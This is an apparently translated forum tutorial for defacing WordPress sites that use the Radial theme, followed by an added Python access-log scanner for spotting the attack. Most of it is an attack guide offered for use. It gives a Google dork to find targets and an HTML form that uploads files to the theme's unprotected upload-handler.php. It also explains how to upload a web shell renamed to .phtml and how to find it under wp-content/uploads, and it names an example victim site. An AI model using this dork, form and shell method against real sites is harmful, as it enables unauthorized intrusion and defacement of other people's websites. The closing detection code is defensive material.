Deface WordPress Radial Theme

Requirements:

1. Dork

inurl:/wp-content/themes/radial-themes
Vary it to find ones that are vulnerable and still untouched :p

2. CSRF
<form enctype="multipart/form-data" action="site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

3. Exploit
/wp-content/themes/radial-theme/functions/upload-handler.php

4. Shell or deface script
       Don't have one yet? Here, my simple deface script, GRAB IT

Steps:
1. Run the dork on Google.

2. Pick one of the sites.

3. Append the exploit path
/wp-content/themes/radial-theme/functions/upload-handler.php
Example:
 http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php

4. If it is vulnerable, the text 'error' will appear.

5. Put the site into the CSRF form.
    Example:
<form enctype="multipart/form-data" action="http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

6. Upload your file. If you want to upload a shell, rename it to .phtml first (example: shell.phtml)

7. If it succeeds, your file name will be displayed.

8. Accessing the file?
site.com/wp-content/uploads/year/month/filename
Example:
http://www.jhttcars.be/wp-content/uploads/2017/01/berandal.txt

If you still don't get it, watch the video below :)
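
From the defender's side, steps 3 to 8 leave a recognizable trail in the web server access log: a request to the theme's upload-handler.php, a POST to it, then a fetch of a script-type file under wp-content/uploads. The log scan below is an added example, not part of the original post; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re

# Path of the theme's upload endpoint, as given on this page.
HANDLER = "/wp-content/themes/radial-theme/functions/upload-handler.php"
# Files under uploads/ that a PHP-enabled server may execute (assumed extension list).
EXEC_UPLOAD = re.compile(
    r"^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)", re.I)
# Apache/nginx "combined" access log format (assumption about the log source).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

SAMPLE = [  # constructed log lines, not taken from a real server
    '192.0.2.10 - - [12/Jan/2017:10:00:01 +0000] "GET /wp-content/themes/radial-theme/functions/upload-handler.php HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2017:10:00:09 +0000] "POST /wp-content/themes/radial-theme/functions/upload-handler.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2017:10:00:15 +0000] "GET /wp-content/uploads/2017/01/x.phtml HTTP/1.1" 200 431 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jan/2017:10:01:00 +0000] "GET /wp-content/uploads/2017/01/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return findings as (ip, kind, path) tuples, in log order."""
    posted = set()      # client IPs that have POSTed to the handler so far
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue    # not a combined-format request line
        ip, method, path = m["ip"], m["method"], m["path"]
        bare = path.split("?", 1)[0]
        if bare == HANDLER:
            if method == "POST":
                posted.add(ip)
                findings.append((ip, "upload-attempt", bare))
            else:
                findings.append((ip, "probe", bare))
        elif EXEC_UPLOAD.match(path) and m["status"] == "200":
            # A script served from uploads/ is suspicious on its own; it is
            # stronger evidence when the same client POSTed to the handler first.
            kind = "uploaded-script-run" if ip in posted else "script-in-uploads"
            findings.append((ip, kind, bare))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Any hit on the handler path is worth triaging by itself, since text or HTML uploads will not match the script pattern. Removing or patching the theme's handler and denying script execution under wp-content/uploads closes the path the steps above rely on.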

